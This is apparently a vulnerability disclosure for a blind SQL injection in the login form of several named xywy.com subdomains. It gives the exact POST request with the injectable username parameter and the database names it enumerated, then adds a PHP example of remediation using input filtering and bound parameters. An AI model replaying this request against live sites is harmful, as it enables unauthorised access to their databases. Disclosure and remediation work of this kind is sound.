MySQL blind injection for multiple sites
Q & A: MySQL injection in the back end of the management system. Multiple similar domain names are affected:
http://xunjian.club.xywy.com
http://dangan.app.xywy.com
http://mxunjian.club.xywy.com
Here is an example:
POST /login.php HTTP/1.1
Content-Length: 229
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://mxunjian.club.xywy.com
Cookie: PHPSESSID=4fb914cabfac3d217c1b1070d4ef3e93
Host: mxunjian.club.xywy.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

submit=%b5%c7%c2%bd&backurl=&code=1234&passwd=123456&phonenum=18888888888&username=*
The username parameter can be injected.
current database: 'club'
current user: '[email protected]'
available databases [3]:
[*] club
[*] information_schema
[*] test
Solution:
Parameter Filtering
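
One way to apply this fix to the username parameter of a login handler, as an added example that is not the site's own code: allow-list filtering of the input combined with a bound query parameter. The table name `admin_user`, the function `check_login` and the sample account are hypothetical, and an in-memory SQLite database stands in for MySQL so the script runs offline.

```php
<?php
// Added example: hypothetical login lookup, not the real login.php.
// SQLite in memory is used only so the script is self-contained; with MySQL
// the PDO calls are the same and only the DSN changes. On pdo_mysql, also set
// PDO::ATTR_EMULATE_PREPARES to false so statements are prepared server-side.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// Constructed sample table and account.
$pdo->exec('CREATE TABLE admin_user (username TEXT PRIMARY KEY, pass_hash TEXT NOT NULL)');
$ins = $pdo->prepare('INSERT INTO admin_user (username, pass_hash) VALUES (?, ?)');
$ins->execute(['alice', password_hash('correct horse', PASSWORD_DEFAULT)]);

// Returns true only for a known user with the right password.
function check_login(PDO $pdo, $username, $passwd): bool
{
    // 1. Parameter filtering: accept only plain strings that match an
    //    allow-list. This also rejects array input such as username[]=x.
    if (!is_string($username) || !is_string($passwd)
        || !preg_match('/\A[A-Za-z0-9_.@-]{1,64}\z/', $username)) {
        return false;
    }

    // 2. Bound parameter: the value is sent separately from the SQL text,
    //    so it can never change the structure of the query.
    $stmt = $pdo->prepare('SELECT pass_hash FROM admin_user WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $hash = $stmt->fetchColumn();

    // 3. Same result for "unknown user" and "wrong password", so the
    //    response does not give a true/false signal about the lookup.
    return is_string($hash) && password_verify($passwd, $hash);
}

// Constructed inputs: a valid login, a value containing SQL syntax, an array.
var_dump(check_login($pdo, 'alice', 'correct horse'));
var_dump(check_login($pdo, "alice' AND '1'='1", 'x'));
var_dump(check_login($pdo, ['alice'], 'x'));
```

The bound parameter is what removes the injection; the allow-list is a second layer and would not be sufficient on its own if any query were still built by string concatenation.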